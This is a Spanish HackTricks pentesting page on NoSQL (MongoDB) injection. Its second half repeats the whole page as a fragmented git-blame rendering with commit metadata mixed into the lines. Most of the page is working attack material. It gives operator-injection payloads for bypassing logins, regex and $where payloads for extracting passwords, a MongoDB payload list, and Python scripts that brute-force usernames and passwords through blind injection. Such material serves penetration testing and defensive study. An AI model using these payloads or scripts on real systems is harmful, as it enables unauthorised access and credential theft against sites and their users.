hacktricks/pentesting-web/nosql-injection.md

# Inyección NoSQL

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** con las herramientas comunitarias **más avanzadas** del mundo.\
Obtén Acceso Hoy:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

Las bases de datos NoSQL ofrecen restricciones de consistencia más flexibles que las bases de datos SQL tradicionales. Al requerir menos restricciones relacionales y verificaciones de consistencia, las bases de datos NoSQL a menudo ofrecen beneficios de rendimiento y escalabilidad. Sin embargo, estas bases de datos aún son potencialmente vulnerables a ataques de inyección, incluso si no utilizan la sintaxis SQL tradicional.

## Explotación

En PHP puedes enviar un Array cambiando el parámetro enviado de _parameter=foo_ a _parameter\[arrName]=foo._

Las explotaciones se basan en agregar un **Operador**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### Evasión de autenticación básica

**Usando no igual ($ne) o mayor ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1//    or    ' || 1==1%00
```
### Extraer información de **longitud**
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### Extraer información de **datos**
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
```
### Ejecución Arbitraria de Funciones en PHP

Usando el operador **$func** de la librería [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (usada por defecto) podría ser posible ejecutar una función arbitraria como en [este informe](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
### Obtener información de diferentes colecciones

Es posible usar [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) para obtener información de una colección diferente. En el siguiente ejemplo, estamos leyendo de una **colección diferente** llamada **`users`** y obteniendo **los resultados de todas las entradas** con una contraseña que coincide con un comodín.
```json
[
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
]
```
## NoSQL a ciegas
```python
import requests, string

alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("<TRUE>" in r.text):
flag += char
print("[+] Flag: "+flag)
break
```

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""

while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## Cargas útiles de MongoDB
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## Herramientas

* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)

### Fuerza bruta para obtener nombres de usuario y contraseñas desde un login POST

Este es un script simple que podrías modificar, pero las herramientas anteriores también pueden realizar esta tarea.
```python
import requests
import string

url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")

def get_usernames():
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
for c in possible_chars:
username = "^" + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print("Found username starting with "+c)
while True:
for c2 in possible_chars:
params["username[$regex]"] = username + c2 + ".*"
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break

if c2 == possible_chars[-1]:
print("Found username: "+username[1:])
usernames.append(username[1:])
break
return usernames


for u in get_usernames():
get_password(u)
```
## Referencias

* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)

<details>

<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente, potenciados por las herramientas comunitarias **más avanzadas**.\
Obtén Acceso Hoy:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`# Inyección NoSQL`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
			`\`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Utiliza [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y automatizar flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.\`
			`Obtén Acceso Hoy:`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}`

			`<details>`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Otras formas de apoyar a HackTricks:`

			`* Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sigue a Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Las bases de datos NoSQL ofrecen restricciones de consistencia más flexibles que las bases de datos SQL tradicionales. Al requerir menos restricciones relacionales y verificaciones de consistencia, las bases de datos NoSQL a menudo ofrecen beneficios de rendimiento y escalabilidad. Sin embargo, estas bases de datos aún son potencialmente vulnerables a ataques de inyección, incluso si no utilizan la sintaxis SQL tradicional.`
f 2023-06-05 18:33:24 +00:00
			`## Explotación`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`En PHP puedes enviar un Array cambiando el parámetro enviado de _parameter=foo_ a _parameter\[arrName]=foo._`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Las explotaciones se basan en agregar un Operador:`
f 2023-06-05 18:33:24 +00:00			```bash
			`username[$ne]=1$password[$ne]=1 #<Not Equals>`
			`username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter`
			`username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value`
			`username[$eq]=admin&password[$ne]=1 #<Equals>`
			`username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users`
			`username[$ne]=admin&pass[$gt]=s #<Greater Than>`
			`username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)`
			`{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`### Evasión de autenticación básica`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Usando no igual ($ne) o mayor ($gt)`
f 2023-06-05 18:33:24 +00:00			```bash
			`#in URL`
			`username[$ne]=toto&password[$ne]=toto`
			`username[$regex]=.&password[$regex]=.`
			`username[$exists]=true&password[$exists]=true`

			`#in JSON`
			`{"username": {"$ne": null}, "password": {"$ne": null} }`
			`{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }`
			`{"username": {"$gt": undefined}, "password": {"$gt": undefined} }`
			```
			`### SQL - Mongo`
			```
			`Normal sql: ' or 1=1-- -`
			`Mongo sql: ' \|\| 1==1// or ' \|\| 1==1%00`
			```
			`### Extraer información de longitud`
			```bash
			`username[$ne]=toto&password[$regex]=.{1}`
			`username[$ne]=toto&password[$regex]=.{3}`
			`# True if the length equals 1,3...`
			```
			`### Extraer información de datos`
			```
			`in URL (if length == 3)`
			`username[$ne]=toto&password[$regex]=a.{2}`
			`username[$ne]=toto&password[$regex]=b.{2}`
			`...`
			`username[$ne]=toto&password[$regex]=m.{2}`
			`username[$ne]=toto&password[$regex]=md.{1}`
			`username[$ne]=toto&password[$regex]=mdp`

			`username[$ne]=toto&password[$regex]=m.*`
			`username[$ne]=toto&password[$regex]=md.*`

			`in JSON`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}`
			```
			`### SQL - Mongo`
			```
			`/?search=admin' && this.password%00 --> Check if the field password exists`
			`/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password`
			`/?search=admin' && this.password && this.password.match(/^a.*$/)%00`
			`/?search=admin' && this.password && this.password.match(/^b.*$/)%00`
			`/?search=admin' && this.password && this.password.match(/^c.*$/)%00`
			`...`
			`/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00`
			`...`
			`/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found`
			```
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`### Ejecución Arbitraria de Funciones en PHP`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Usando el operador $func de la librería [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (usada por defecto) podría ser posible ejecutar una función arbitraria como en [este informe](https://swarm.ptsecurity.com/rce-cockpit-cms/).`
f 2023-06-05 18:33:24 +00:00			```python
			`"user":{"$func": "var_dump"}`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`### Obtener información de diferentes colecciones`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			Es posible usar [$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) para obtener información de una colección diferente. En el siguiente ejemplo, estamos leyendo de una colección diferente llamada `users` y obteniendo los resultados de todas las entradas con una contraseña que coincide con un comodín.
f 2023-06-05 18:33:24 +00:00			```json
			`[`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`{`
			`"$lookup":{`
			`"from": "users",`
			`"as":"resultado","pipeline": [`
			`{`
			`"$match":{`
			`"password":{`
			`"$regex":"^.*"`
			`}`
			`}`
			`}`
			`]`
			`}`
			`}`
f 2023-06-05 18:33:24 +00:00			`]`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`## NoSQL a ciegas`
f 2023-06-05 18:33:24 +00:00			```python
			`import requests, string`

			`alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(21):`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`print("[i] Looking for char number "+str(i+1))`
			`for char in alphabet:`
			`r = requests.get("http://chall.com?param=^"+flag+char)`
			`if ("<TRUE>" in r.text):`
			`flag += char`
			`print("[+] Flag: "+flag)`
			`break`
f 2023-06-05 18:33:24 +00:00			```

			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`

			`while True:`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|']:`
			`payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)`
			`r = requests.post(u, data = {'ids': payload}, verify = False)`
			`if 'OK' in r.text:`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
f 2023-06-05 18:33:24 +00:00			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2023-09-28 19:22:43 +00:00			`## Cargas útiles de MongoDB`
f 2023-06-05 18:33:24 +00:00			```
			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`
			```
			`## Herramientas`

			`* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)`
			`* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`### Fuerza bruta para obtener nombres de usuario y contraseñas desde un login POST`
f 2023-06-05 18:33:24 +00:00
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`Este es un script simple que podrías modificar, pero las herramientas anteriores también pueden realizar esta tarea.`
f 2023-06-05 18:33:24 +00:00			```python
			`import requests`
			`import string`

			`url = "http://example.com"`
			`headers = {"Host": "exmaple.com"}`
			`cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}`
			`possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]`
			`def get_password(username):`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`print("Extracting password of "+username)`
			`params = {"username":username, "password[$regex]":"", "login": "login"}`
			`password = "^"`
			`while True:`
			`for c in possible_chars:`
			`params["password[$regex]"] = password + c + ".*"`
			`pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)`
			`if int(pr.status_code) == 302:`
			`password += c`
			`break`
			`if c == possible_chars[-1]:`
			`print("Found password "+password[1:].replace("\\", "")+" for username "+username)`
			`return password[1:].replace("\\", "")`
f 2023-06-05 18:33:24 +00:00
			`def get_usernames():`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`usernames = []`
			`params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}`
			`for c in possible_chars:`
			`username = "^" + c`
			`params["username[$regex]"] = username + ".*"`
			`pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)`
			`if int(pr.status_code) == 302:`
			`print("Found username starting with "+c)`
			`while True:`
			`for c2 in possible_chars:`
			`params["username[$regex]"] = username + c2 + ".*"`
			`if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:`
			`username += c2`
			`print(username)`
			`break`

			`if c2 == possible_chars[-1]:`
			`print("Found username: "+username[1:])`
			`usernames.append(username[1:])`
			`break`
			`return usernames`
f 2023-06-05 18:33:24 +00:00

			`for u in get_usernames():`
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi 2023-09-03 18:12:01 +00:00			`get_password(u)`
f 2023-06-05 18:33:24 +00:00			```
			`## Referencias`

			`* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)`
			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)`

			`<details>`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`* Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de github [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
			`\`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2023-12-31 04:28:03 +00:00			`Usa [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y automatizar flujos de trabajo fácilmente, potenciados por las herramientas comunitarias más avanzadas.\`
			`Obtén Acceso Hoy:`
f 2023-06-05 18:33:24 +00:00
			`{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}`